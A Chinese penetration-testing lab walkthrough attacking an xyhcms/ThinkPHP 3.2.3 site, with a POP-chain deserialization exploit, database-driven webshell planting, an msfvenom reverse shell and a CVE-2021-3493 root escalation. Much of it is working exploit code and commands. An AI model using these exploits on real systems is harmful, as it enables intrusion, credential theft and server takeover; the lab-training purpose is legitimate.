scaner 从外网到内网域渗透
1.环境配置
1.1靶场信息
用到的虚拟机共有三个 分别是 12server-db 、12-dc 、web1
12server-db、web1 这两个可以使用桥接或者nat模式根据需求可以设置 网卡1
12-dc用的是VMnet 19 这台机子已经绑定ip
| 主机名 | ip | 账号和密码 |
|---|---|---|
| web1 | 192.168.0.160 | web1 root@123 |
| db | 192.168.0.161 10.10.10.136 | administrator qweasd666 |
| ad | 10.10.10.135 | scaner\administrator QWEasd000 scaner\db db123456 |
web1 网站 http://192.168.0.160/xyhai.php?s=/Login/index admin 123456qq
外网面板地址: http://116.27.231.161:8888/e955a525
内网面板地址: http://192.168.0.160:8888/e955a525
username: m0gy9yes
password: c693d359
db主机上的 mssql服务 sa freepass
2.1 网络拓扑图
2.外网打点
2.1 扫描端口
nmap -v -sV -A 192.168.0.160
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp closed ftp
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-title: \xE6\x88\x91\xE7\x9A\x84\xE7\xBD\x91\xE7\xAB\x99
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-favicon: Unknown favicon MD5: BC2D3C52FF445E759E5EB54AB8239359
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
888/tcp open http Apache httpd
|_http-title: 403 Forbidden
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache
8888/tcp open http nginx
| http-title: \xE5\xAE\x89\xE5\x85\xA8\xE5\x85\xA5\xE5\x8F\xA3\xE6\xA0\xA1\xE9\xAA\x8C\xE5\xA4\xB1\xE8\xB4\xA5
|_Requested resource was /login
|_http-favicon: Unknown favicon MD5: B351F027909EE2AC274599CE01D004E9
| http-methods:
|_ Supported Methods: GET POST
Service Info: Host: 0b842aa5.phpmyadmin[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jBO3iSlI-1672385126585)(项目四 scaner.assets/1.png)]
2.2 信息收集
访问端口发现这个是宝塔的控制面板
访问80端口
从 https://evalshell.com/ 找到几个漏洞
2.3 gobuster扫描网站
简单扫描一下 获取网站目录结构
gobuster dir -u http://192.168.0.160/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x '.php' -o dir.txt
/search (Status: 200) [Size: 4375]
/archive (Status: 200) [Size: 5485]
/index (Status: 200) [Size: 10964]
/home (Status: 200) [Size: 10964]
/index.php (Status: 200) [Size: 10964]
/home.php (Status: 200) [Size: 10964]
/uploads (Status: 301) [Size: 300] [--> http://192.168.0.160/uploads/]
/0 (Status: 200) [Size: 10964]
/go (Status: 200) [Size: 0]
/index2 (Status: 200) [Size: 383]
/mobile (Status: 200) [Size: 7627]
/member (Status: 302) [Size: 0] [--> /index.php?s=/Home/Public/login.html]
/mobile.php (Status: 200) [Size: 7627]
/Home.php (Status: 200) [Size: 10964]
/show (Status: 200) [Size: 2829]
/Home (Status: 200) [Size: 10964]
/special (Status: 200) [Size: 4444]
/review (Status: 200) [Size: 0]
/Search (Status: 200) [Size: 4375]
/Index (Status: 200) [Size: 10964]
/Archive (Status: 200) [Size: 5485]
/guestbook (Status: 200) [Size: 5129]
/avatar (Status: 301) [Size: 299] [--> http://192.168.0.160/avatar/]
/Public (Status: 301) [Size: 299] [--> http://192.168.0.160/Public/]
/LICENSE (Status: 403) [Size: 262]
/Mobile (Status: 200) [Size: 7627]
/Mobile.php (Status: 200) [Size: 7627]
/Data (Status: 301) [Size: 297] [--> http://192.168.0.160/Data/]
/App (Status: 301) [Size: 296] [--> http://192.168.0.160/App/]
/Special (Status: 200) [Size: 4444]
/Member (Status: 302) [Size: 0] [--> /index.php?s=/Home/Public/login.html]
/Install (Status: 301) [Size: 300] [--> http://192.168.0.160/Install/]
/Review (Status: 200) [Size: 0]
/Include (Status: 301) [Size: 300] [--> http://192.168.0.160/Include/]
/Go (Status: 200) [Size: 0]
/Show (Status: 200) [Size: 2829]
/Guestbook (Status: 200) [Size: 5129]
/%3FRID%3D2671 (Status: 200) [Size: 10964]
/%3FRID%3D2671.php (Status: 200) [Size: 10964]
/Index2 (Status: 200) [Size: 383]
/DAPLICENSE (Status: 403) [Size: 262]2.4 存在目录可浏览
敏感目录可浏览
http://192.168.0.160/App/
2.5 thinkphp日志目录
http://192.168.0.160/App/Runtime/Logs/Common/22_05_06.log
http://192.168.0.160/App/Runtime/Logs/Home/22_05_06.log
http://192.168.0.160/App/Runtime/Logs/Home/22_05_06.log
2.6 目录报错 得到网站路径
http://192.168.0.160/App/Runtime/common~runtime.php
Fatal error: Class 'Think\Think' not found in /www/wwwroot/www.xycms.com/App/Runtime/common~runtime.php on line 65
2.7 验证码识别+top100弱口令登录后台
从漏洞库得到信息基本都是关于后台有关联的 但是后台是有验证码防御的。
http://192.168.0.160/xyhai.php?s=/Login/index
测试验证码没有绕过的相关的漏洞 尝试验证码是否能识别
使用工具进行识别破解 验证码是可以识别出来但是进行穷举的时候 密码大于10次的时候会自动封禁ip
打算使用burpsuite 伪造ip进行识别穷举的 但是看到这段代码
当 $adv是true的时候才会进入才能伪造ip 使用burpsuite伪造ip是行不通了。
function get_client_ip($type = 0, $adv = false) {$type = $type ? 1 : 0;static $ip = NULL;if ($ip !== NULL) {return $ip[$type];}if ($adv) {if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {$arr = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);$pos = array_search('unknown', $arr);if (false !== $pos) {unset($arr[$pos]);}$ip = trim($arr[0]);} elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {$ip = $_SERVER['HTTP_CLIENT_IP'];} elseif (isset($_SERVER['REMOTE_ADDR'])) {$ip = $_SERVER['REMOTE_ADDR'];}} elseif (isset($_SERVER['REMOTE_ADDR'])) {$ip = $_SERVER['REMOTE_ADDR'];}$long = sprintf("%u", ip2long($ip));$ip = $long ? array($ip, $long) : array('0.0.0.0', 0);return $ip[$type];可以试着购买代理池 编写脚本结合验证码识别再进行破解。
3.xyhcms漏洞分析
xyhcms是thinkphp3.2.3框架开发的,thinkphp的漏洞都是默认存在的。 痛失CVE之xyhcms(thinkphp3.2.3)反序列化 https://www.freebuf.com/articles/web/264645.html 作者说的这个版本是旧版,新版的版本已经把site.php放到一个随机值的目录下,因为网站存在目录可浏览
可以对其进行访问 192.168.0.160/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c_config/site.php
P4tzizR6d CFG_COOKIE_ENCODE 加密的key 下个源码来分析一下
分析的版本是 xyhcms_v3.6_20210602
3.1 登录加密分析
App/Common/Common/function.php
function get_cookie($name, $key = '') {if (!isset($_COOKIE[$name])) {return null;}$key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key;$value = $_COOKIE[$name];$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_decrypt($value);return unserialize($value);
}/*** 设置cookie** @param array $args* @return boolean*/
//使用时修改密钥$key 涉及金额结算请重新设计cookie存储格式
//function set_cookie($args , $key = '@^%$y5fbl') {
function set_cookie($args, $key = '') {$key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key;$name = $args['name'];$expire = isset($args['expire']) ? $args['expire'] : null;$path = isset($args['path']) ? $args['path'] : '/';$domain = isset($args['domain']) ? $args['domain'] : null;$secure = isset($args['secure']) ? $args['secure'] : 0;$value = serialize($args['value']);$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_encrypt($value);//setcookie($cookieName ,$cookie, time()+3600,'/','',false);return setcookie($name, $value, $expire, $path, $domain, $secure); //失效时间 0关闭浏览器即失效
}在 这个get_cookie 函数里面 存在 unserialize 可以试着用反序列化进行一些pop调用。下面对这些函数进行注释
function get_cookie($name, $key = '') { //传入cookie的名 和加密的key 默认为空if (!isset($_COOKIE[$name])) { //判断是否有值 空就返回null 不为空就往下走return null;}$key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key; //这个key就是 从site.php里面获取$value = $_COOKIE[$name]; //得到cookie的值$key = md5($key); //key进行md5加密 $sc = new \Common\Lib\SysCrypt($key); //将赋值到类的构造函数内$value = $sc->php_decrypt($value);//调用类中的 php_decrypt进行解密return unserialize($value); //将序列化的内容进行反序列化
}
查看调用的地方 还是挺多的
接着看下值是什么设置
function set_cookie($args, $key = '') {$key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key; //获取值 本地测试的值是 J8qp9z2vj$name = $args['name'];//获取name的键$expire = isset($args['expire']) ? $args['expire'] : null; $path = isset($args['path']) ? $args['path'] : '/';$domain = isset($args['domain']) ? $args['domain'] : null;$secure = isset($args['secure']) ? $args['secure'] : 0;$value = serialize($args['value']); //这里设置设置值$key = md5($key);//md5加密key $sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_encrypt($value); //进行加密处理//setcookie($cookieName ,$cookie, time()+3600,'/','',false);return setcookie($name, $value, $expire, $path, $domain, $secure); //失效时间 0关闭浏览器即失效
}
SysCrypt->php_encrypt 查看这个函数
namespace Common\Lib;class SysCrypt {private $crypt_key;// 构造函数 public function __construct($crypt_key) {$this -> crypt_key = $crypt_key;}public function php_encrypt($txt) { //传入值 srand((double)microtime() * 1000000);$encrypt_key = md5(rand(0,32000));$ctr = 0;$tmp = '';for($i = 0;$i<strlen($txt);$i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; //获取crypt_key进行处理$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);}return base64_encode(self::__key($tmp,$this -> crypt_key)); //处理后 base64加密返回值}public function php_decrypt($txt) {$txt = self::__key(base64_decode($txt),$this -> crypt_key);$tmp = '';for($i = 0;$i < strlen($txt); $i++) {$md5 = $txt[$i];$tmp .= $txt[++$i] ^ $md5;}return $tmp;}private function __key($txt,$encrypt_key) {$encrypt_key = md5($encrypt_key);$ctr = 0;$tmp = '';for($i = 0; $i < strlen($txt); $i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];}return $tmp;}public function __destruct() {$this -> crypt_key = null;}
}/*
$sc = new SysCrypt('phpwms');
$text = '110';
print($sc -> php_encrypt($text));
print('<br>');
print($sc -> php_decrypt($sc -> php_encrypt($text)));
*/
?>VHtVZwQ1VT9SdghoAWxTOF9kBndUMgBmU38Abg== 这个是登录后nickname名的值
对其进行解
把代码加密和解密构造一下
<?php
class SysCrypt {private $crypt_key;// 构造函数public function __construct($crypt_key) {$this -> crypt_key = $crypt_key;}public function php_encrypt($txt) {srand((double)microtime() * 1000000);$encrypt_key = md5(rand(0,32000));$ctr = 0;$tmp = '';for($i = 0;$i<strlen($txt);$i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);}return base64_encode(self::__key($tmp,$this -> crypt_key));}public function php_decrypt($txt) {$txt = self::__key(base64_decode($txt),$this -> crypt_key);$tmp = '';for($i = 0;$i < strlen($txt); $i++) {$md5 = $txt[$i];$tmp .= $txt[++$i] ^ $md5;}return $tmp;}private function __key($txt,$encrypt_key) {$encrypt_key = md5($encrypt_key);$ctr = 0;$tmp = '';for($i = 0; $i < strlen($txt); $i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];}return $tmp;}public function __destruct() {$this -> crypt_key = null;}
}/*** 得到指定cookie的值** @param string $name*/
//function get_cookie($name, $key = '@^%$y5fbl') {
function get_cookie($name, $key = '') {$key ='J8qp9z2vj';$value = $name;$key = md5($key);$sc = new SysCrypt($key);$value = $sc->php_decrypt($value);return unserialize($value);
}/*** 设置cookie** @param array $args* @return boolean*/
//使用时修改密钥$key 涉及金额结算请重新设计cookie存储格式
//function set_cookie($args , $key = '@^%$y5fbl') {
function set_cookie($args, $key = '') {$key ='J8qp9z2vj';$value = serialize($args);$key = md5($key);$sc = new SysCrypt($key);$value = $sc->php_encrypt($value);return $value;//setcookie($cookieName ,$cookie, time()+3600,'/','',false);// return setcookie($name, $value, $expire, $path, $domain, $secure); //失效时间 0关闭浏览器即失效
}//测试加密echo set_cookie('moonsec');//测试解密echo get_cookie('AywIOgMyCWNSdgxsBGkAawU+BncAZgRiDiJTPQ==');?>从源码上可以看到登录网站是从cookie里面获取的,证明加密是没错的化 可以先构造一个hacker 再接着修改cookie查看是否再网页里
XXIBM1JiVD4EIApvBGcHYFVrC2wBcFN0BjM= 这个解密是hacker
这样证明加密方式是没错的。
3.2 thinkphp3.2.3反序列化漏洞
thinkphp3.2.3 这个版本是存在反序列化漏洞的。前人已经进行分析过。 https://xz.aliyun.com/t/9441 而xyhcms get_cookie存在 unserialize 这个是漏洞的触发点 通过生成的序列化文件进行 set_cookie 加密生成密文即可。
首先分析一下thinkphp3.2.3大致流程 寻找 类中的 __destruct函数,寻找调用链
Include/Library/Think/Image/Driver/Imagick.class.php
public function __destruct() {empty($this->img) || $this->img->destroy(); //$this->img 这个部分是可控的}
接着看那个类调用 destroy() 只有两个类存在 destroy函数 分别是
Include/Library/Think/Session/Driver/Memcache.class.php
Include/Library/Think/Session/Driver/Db.class.php把重点放在Memcache.class.php 内
public function destroy($sessID) {return $this->handle->delete($this->sessionName.$sessID);}看到 destroy($sessID)是存在参数的 但是在php7.0以上的版本会出现致命的错误让代码无法执行。在5.6版本提示错误 ,但是还会正常执行。接着找 哪个类 delete调用这个函数 。Include/Library/Think/Model.class.php
public function delete($options = array()) {$pk = $this->getPk(); if (empty($options) && empty($this->options['where'])) { // 如果删除条件为空 则删除当前数据对象所对应的记录if (!empty($this->data) && isset($this->data[$pk])) {return $this->delete($this->data[$pk]);} else {return false;}}if (is_numeric($options) || is_string($options)) {// 根据主键删除记录if (strpos($options, ',')) {$where[$pk] = array('IN', $options);} else {$where[$pk] = $options;}$options = array();$options['where'] = $where;}// 根据复合主键删除记录if (is_array($options) && (count($options) > 0) && is_array($pk)) {$count = 0;foreach (array_keys($options) as $key) {if (is_int($key)) {$count++;}}if ($count == count($pk)) {$i = 0;foreach ($pk as $field) {$where[$field] = $options[$i];unset($options[$i++]);}$options['where'] = $where;} else {return false;}}// 分析表达式$options = $this->_parseOptions($options);if (empty($options['where'])) {// 如果条件为空 不进行删除操作 除非设置 1=1return false;}//!is_array($pk) new add by gosea--20171016 --联合主键报错if (!is_array($pk) && is_array($options['where']) && isset($options['where'][$pk])) {$pkValue = $options['where'][$pk];}if (false === $this->_before_delete($options)) {return false;}$result = $this->db->delete($options);if (false !== $result && is_numeric($result)) {$data = array();if (isset($pkValue)) {$data[$pk] = $pkValue;}$this->_after_delete($data, $options);}// 返回删除记录个数return $result;}
这里主要看539 $result = this−>db−>delete(this->db->delete(this−>db−>delete(options); 这里的db是可以传入一个对象的。即可以调用任何类的delete方法
Include/Library/Think/Db/Driver.class.php
public function delete($options=array()) {$this->model = $options['model'];$this->parseBind(!empty($options['bind'])?$options['bind']:array());$table = $this->parseTable($options['table']); //这里获取table下标的内容$sql = 'DELETE FROM '.$table;if(strpos($table,',')){// 多表删除支持USING和JOIN操作if(!empty($options['using'])){$sql .= ' USING '.$this->parseTable($options['using']).' ';}$sql .= $this->parseJoin(!empty($options['join'])?$options['join']:'');}$sql .= $this->parseWhere(!empty($options['where'])?$options['where']:'');if(!strpos($table,',')){// 单表删除支持order和limit$sql .= $this->parseOrder(!empty($options['order'])?$options['order']:'').$this->parseLimit(!empty($options['limit'])?$options['limit']:'');}$sql .= $this->parseComment(!empty($options['comment'])?$options['comment']:'');return $this->execute($sql,!empty($options['fetch_sql']) ? true : false);}
跟进 execute $this->initConnect(true);
/*** 初始化数据库连接* @access protected* @param boolean $master 主服务器* @return void*/protected function initConnect($master=true) {if(!empty($this->config['deploy']))// 采用分布式数据库$this->_linkID = $this->multiConnect($master);else// 默认单数据库if ( !$this->_linkID ) $this->_linkID = $this->connect();}跟进 $this->connect();
public function connect($config='',$linkNum=0,$autoConnection=false) {if ( !isset($this->linkID[$linkNum]) ) {if(empty($config)) $config = $this->config;try{if(empty($config['dsn'])) {$config['dsn'] = $this->parseDsn($config);}if(version_compare(PHP_VERSION,'5.3.6','<=')){ // 禁用模拟预处理语句$this->options[PDO::ATTR_EMULATE_PREPARES] = false;}$this->linkID[$linkNum] = new PDO( $config['dsn'], $config['username'], $config['password'],$this->options);}catch (\PDOException $e) {if($autoConnection){trace($e->getMessage(),'','ERR');return $this->connect($autoConnection,$linkNum);}else{E($e->getMessage());}}}return $this->linkID[$linkNum];}
$this->config 这个部分是配置文件
protected $config = array('type' => '', // 数据库类型'hostname' => '127.0.0.1', // 服务器地址'database' => '', // 数据库名'username' => '', // 用户名'password' => '', // 密码'hostport' => '', // 端口 'dsn' => '', // 'params' => array(), // 数据库连接参数 'charset' => 'utf8', // 数据库编码默认采用utf8 'prefix' => '', // 数据库表前缀'debug' => false, // 数据库调试模式'deploy' => 0, // 数据库部署方式:0 集中式(单一服务器),1 分布式(主从服务器)'rw_separate' => false, // 数据库读写是否分离 主从式有效'master_num' => 1, // 读写分离后 主服务器数量'slave_no' => '', // 指定从服务器序号'db_like_fields' => '', );
通过pdo 连接数据库
$this->linkID[$linkNum] = new PDO( $config['dsn'], $config['username'], $config['password'],$this->options);}catch (\PDOException $e) {if($autoConnection){trace($e->getMessage(),'','ERR');return $this->connect($autoConnection,$linkNum);}else{E($e->getMessage());}
抽象类abstract class Driver 需要被继承使用
选择 Mysql 所以执行
public function insertAll($dataSet,$options=array(),$replace=false) {$values = array();$this->model = $options['model'];if(!is_array($dataSet[0])) return false;$this->parseBind(!empty($options['bind'])?$options['bind']:array());$fields = array_map(array($this,'parseKey'),array_keys($dataSet[0]));foreach ($dataSet as $data){$value = array();foreach ($data as $key=>$val){if(is_array($val) && 'exp' == $val[0]){$value[] = $val[1];}elseif(is_scalar($val)){if(0===strpos($val,':') && in_array($val,array_keys($this->bind))){$value[] = $this->parseValue($val);}else{$name = count($this->bind);$value[] = ':'.$name;$this->bindParam($name,$val);}}}$values[] = '('.implode(',', $value).')';}$sql = ($replace?'REPLACE':'INSERT').' INTO '.$this->parseTable($options['table']).' ('.implode(',', $fields).') VALUES '.implode(',',$values);$sql .= $this->parseComment(!empty($options['comment'])?$options['comment']:'');return $this->execute($sql,!empty($options['fetch_sql']) ? true : false);}
$this->execute 还是调用父类 Driver.class.php的execute去执行。
3.3 thinkphp3.2.3 pop链编写
exp可以参考 https://www.freebuf.com/articles/web/264645.html 和 https://mp.weixin.qq.com/s/S3Un1EM-cftFXr8hxG4qfA
其实都差不多。直接拿来用就可以了。
首先弄一个入口点 方便我们进行调试 当前你也可以直接用exp直接打就可以了。
<?php
namespace Home\Controller;class Index2Controller extends HomeCommonController {//方法:indexpublic function index() {unserialize(base64_decode($_GET['id']));// echo get_cookie('email');$this->display();}
}pop链 exp直接拿来用了
<?php
namespace Think\Image\Driver;
use Think\Session\Driver\Memcache;
class Imagick{private $img;public function __construct(){$this->img = new Memcache();}
}namespace Think\Session\Driver;
use Think\Model;
class Memcache {protected $handle;public function __construct(){$this->sessionName=null;$this->handle= new Model();}
}namespace Think;
use Think\Db\Driver\Mysql;
class Model{protected $pk;protected $options;protected $data;protected $db;public function __construct(){$this->options['where']='';$this->pk='jiang';$this->data[$this->pk]=array("table"=>"mysql.user where 1=updatexml(1,concat(0x7e,user()),1)#","where"=>"1=1");$this->db=new Mysql();}
}
namespace Think\Db\Driver;
use PDO;
class Mysql{protected $options ; protected $config ;public function __construct(){$this->options= array(PDO::MYSQL_ATTR_LOCAL_INFILE => true ); // 开启才能读取文件$this->config= array("debug" => 1,"database" => "mysql","hostname" => "127.0.0.1","hostport" => "3306","charset" => "utf8","username" => "root","password" => "root");}
}use Think\Image\Driver\Imagick;
echo base64_encode(serialize(new Imagick()));
http://www.xycms3.com/?s=home/index2&id=TzoyNjoiVGhpbmtcSW1hZ2VcRHJpdmVyXEltYWdpY2siOjE6e3M6MzE6IgBUaGlua1xJbWFnZVxEcml2ZXJcSW1hZ2ljawBpbWciO086Mjk6IlRoaW5rXFNlc3Npb25cRHJpdmVyXE1lbWNhY2hlIjoyOntzOjk6IgAqAGhhbmRsZSI7TzoxMToiVGhpbmtcTW9kZWwiOjQ6e3M6NToiACoAcGsiO3M6NToiamlhbmciO3M6MTA6IgAqAG9wdGlvbnMiO2E6MTp7czo1OiJ3aGVyZSI7czowOiIiO31zOjc6IgAqAGRhdGEiO2E6MTp7czo1OiJqaWFuZyI7YToyOntzOjU6InRhYmxlIjtzOjU0OiJteXNxbC51c2VyIHdoZXJlIDE9dXBkYXRleG1sKDEsY29uY2F0KDB4N2UsdXNlcigpKSwxKSMiO3M6NToid2hlcmUiO3M6MzoiMT0xIjt9fXM6NToiACoAZGIiO086MjE6IlRoaW5rXERiXERyaXZlclxNeXNxbCI6Mjp7czoxMDoiACoAb3B0aW9ucyI7YToxOntpOjEwMDE7YjoxO31zOjk6IgAqAGNvbmZpZyI7YTo3OntzOjU6ImRlYnVnIjtpOjE7czo4OiJkYXRhYmFzZSI7czo1OiJteXNxbCI7czo4OiJob3N0bmFtZSI7czo5OiIxMjcuMC4wLjEiO3M6ODoiaG9zdHBvcnQiO3M6NDoiMzMwNiI7czo3OiJjaGFyc2V0IjtzOjQ6InV0ZjgiO3M6ODoidXNlcm5hbWUiO3M6NDoicm9vdCI7czo4OiJwYXNzd29yZCI7czo0OiJyb290Ijt9fX1zOjExOiJzZXNzaW9uTmFtZSI7Tjt9fQ==
在调试里发现root已经现实出来了 但是在页面内没有现实出来,但是在日志记录
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SCTlAdmZ-1672385126621)(项目四 scaner.assets/119.png)]
获取密码
<?php
namespace Think\Image\Driver;
use Think\Session\Driver\Memcache;
class Imagick{private $img;public function __construct(){$this->img = new Memcache();}
}namespace Think\Session\Driver;
use Think\Model;
class Memcache {protected $handle;public function __construct(){$this->sessionName=null;$this->handle= new Model();}
}namespace Think;
use Think\Db\Driver\Mysql;
class Model{protected $pk;protected $options;protected $data;protected $db;public function __construct(){$this->options['where']='';$this->pk='jiang';$this->data[$this->pk]=array("table"=>"mysql.user where 1=updatexml(1,(select password from xyh_admin limit 1),1)#","where"=>"1=1");$this->db=new Mysql();}
}
namespace Think\Db\Driver;
use PDO;
class Mysql{protected $options ; protected $config ;public function __construct(){$this->options= array(PDO::MYSQL_ATTR_LOCAL_INFILE => true ); // 开启才能读取文件$this->config= array("debug" => 1,"database" => "mysql","hostname" => "127.0.0.1","hostport" => "3306","charset" => "utf8","username" => "root","password" => "root");}
}use Think\Image\Driver\Imagick;
echo base64_encode(serialize(new Imagick()));
再来查看目标 首先要有目标的mysql账号和密码 可以利用mysql远程读取文件。
3.3 thinkphp 3.2.3 读取文件
下载 https://github.com/allyshka/Rogue-MySql-Server
把exp的数据库连接改成这个ip即可
<?php
namespace Think\Db\Driver;
use PDO;
class Mysql{protected $options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true);protected $config = array("dsn" => "mysql:host=192.168.0.168;dbname=xyhcms;port=3307","username" => "root","password" => "root");
}namespace Think;
class Model{protected $options = array();protected $pk;protected $data = array();protected $db = null;public function __construct(){$this->db = new \Think\Db\Driver\Mysql();$this->options['where'] = '';$this->pk = 'luoke';$this->data[$this->pk] = array("table" => "xyh_admin_log","where" => "id=0");}
}namespace Think\Session\Driver;
class Memcache{protected $handle;public function __construct() {$this->handle = new \Think\Model();}
}namespace Think\Image\Driver;
class Imagick{private $img;public function __construct() {$this->img = new \Think\Session\Driver\Memcache();}
}namespace Common\Lib;
class SysCrypt{private $crypt_key;public function __construct($crypt_key) {$this -> crypt_key = $crypt_key;}public function php_encrypt($txt) {srand((double)microtime() * 1000000);$encrypt_key = md5(rand(0,32000));$ctr = 0;$tmp = '';for($i = 0;$i<strlen($txt);$i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);}return base64_encode(self::__key($tmp,$this -> crypt_key));}public function php_decrypt($txt) {$txt = self::__key(base64_decode($txt),$this -> crypt_key);$tmp = '';for($i = 0;$i < strlen($txt); $i++) {$md5 = $txt[$i];$tmp .= $txt[++$i] ^ $md5;}return $tmp;}private function __key($txt,$encrypt_key) {$encrypt_key = md5($encrypt_key);$ctr = 0;$tmp = '';for($i = 0; $i < strlen($txt); $i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];}return $tmp;}public function __destruct() {$this -> crypt_key = null;}
}function get_cookie($name, $key = '') {$key = 'P4tzizR6d';$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_decrypt($name);return unserialize($value);
}function set_cookie($args, $key = '') {$key = 'P4tzizR6d';$value = serialize($args);$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_encrypt($value);return $value;
}$b = new \Think\Image\Driver\Imagick();
$a = set_cookie($b,'');
echo str_replace('+','%2B',$a);
文件也读取到了
mysql的账号root 和密码 9a973fd7928bb3c2 数据库为 www_xycms_com 接着改exp
往管理员添加用户
"where" => "id=0;insert into www_xycms_com.xyh_admin (id,username,password,encrypt,user_type,is_lock,login_num) VALUES (null,'test','88bf2f72156e8e2accc2215f7a982a83','sggFkZ',9,0,4);"
登录后台了。
3.4 xyhcms getshell
<?php
namespace Think\Db\Driver;
use PDO;
class Mysql{protected $options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true);protected $config = array("dsn" => "mysql:host=127.0.0.1;dbname=www_xycms_com;port=3306","username" => "root","password" => "9a973fd7928bb3c2");
}namespace Think;
class Model{protected $options = array();protected $pk;protected $data = array();protected $db = null;public function __construct(){$this->db = new \Think\Db\Driver\Mysql();$this->options['where'] = '';$this->pk = 'luoke';$this->data[$this->pk] = array("table" => "xyh_admin_log","where" => "id=0; alter table xyh_guestbook add column `<script language='php'>eval(\$_POST[cmd]);</script>` varchar(10);",);}
}namespace Think\Session\Driver;
class Memcache{protected $handle;public function __construct() {$this->handle = new \Think\Model();}
}namespace Think\Image\Driver;
class Imagick{private $img;public function __construct() {$this->img = new \Think\Session\Driver\Memcache();}
}namespace Common\Lib;
class SysCrypt{private $crypt_key;public function __construct($crypt_key) {$this -> crypt_key = $crypt_key;}public function php_encrypt($txt) {srand((double)microtime() * 1000000);$encrypt_key = md5(rand(0,32000));$ctr = 0;$tmp = '';for($i = 0;$i<strlen($txt);$i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);}return base64_encode(self::__key($tmp,$this -> crypt_key));}public function php_decrypt($txt) {$txt = self::__key(base64_decode($txt),$this -> crypt_key);$tmp = '';for($i = 0;$i < strlen($txt); $i++) {$md5 = $txt[$i];$tmp .= $txt[++$i] ^ $md5;}return $tmp;}private function __key($txt,$encrypt_key) {$encrypt_key = md5($encrypt_key);$ctr = 0;$tmp = '';for($i = 0; $i < strlen($txt); $i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];}return $tmp;}public function __destruct() {$this -> crypt_key = null;}
}function get_cookie($name, $key = '') {$key = 'P4tzizR6d';$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_decrypt($name);return unserialize($value);
}function set_cookie($args, $key = '') {$key = 'P4tzizR6d';$value = serialize($args);$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_encrypt($value);return $value;
}$b = new \Think\Image\Driver\Imagick();
$a = set_cookie($b,'');
echo str_replace('+','%2B',$a);在后台清理缓存 访问 http://192.168.0.160//index.php?s=/Guestbook/index.html生成缓存再访问
http://192.168.0.160/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c__fields/www_xycms_com.xyh_guestbook.php
终于进来了。
4.linux提权
4.1 绕过宝塔命令执行
bt 禁止命令执行 可以通过 插件进行绕过 tmp目录下有这个文件 /tmp/php-cgi-56.sock
可以执行命令了。
4.2 宝塔系统特权提升
首先反弹一只shell 这里用msf
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.168 lport=12345 -f elf -o shell
chmod +x shell
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 12345
lport => 12345
msf6 exploit(multi/handler) > set lhost 192.168.0.168
lhost => 192.168.0.168
msf6 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.0.168:12345
[*] Sending stage (3020772 bytes) to 192.168.0.160
[*] Meterpreter session 1 opened (192.168.0.168:12345 -> 192.168.0.160:59870 ) at 2022-05-07 08:55:03 -0400meterpreter > 
切换shell python3 -c 'import pty;pty.spawn("/bin/bash")'
/www/server/panel/data/default.db 这个是宝塔的数据库文件,里面存宝塔的配置信息 包括账号和密码等敏感信息,但是当前的权限无法访问。
4.3 CVE-2021-3493 提权 ubuntu18.04
最后通过这个cve的exp成功提权到root 下载地址 https://github.com/briskets/CVE-2021-3493
gcc -o exploit exploit.c
chmod +x exploit
4.4 hashcat 破解 /etc/shadow
root:x:0:0:root:/root:/bin/bash
web1:x:1000:1000:web1,,,:/home/web1:/bin/bash
db:x:1003:1003:,,,:/home/db:/bin/bash
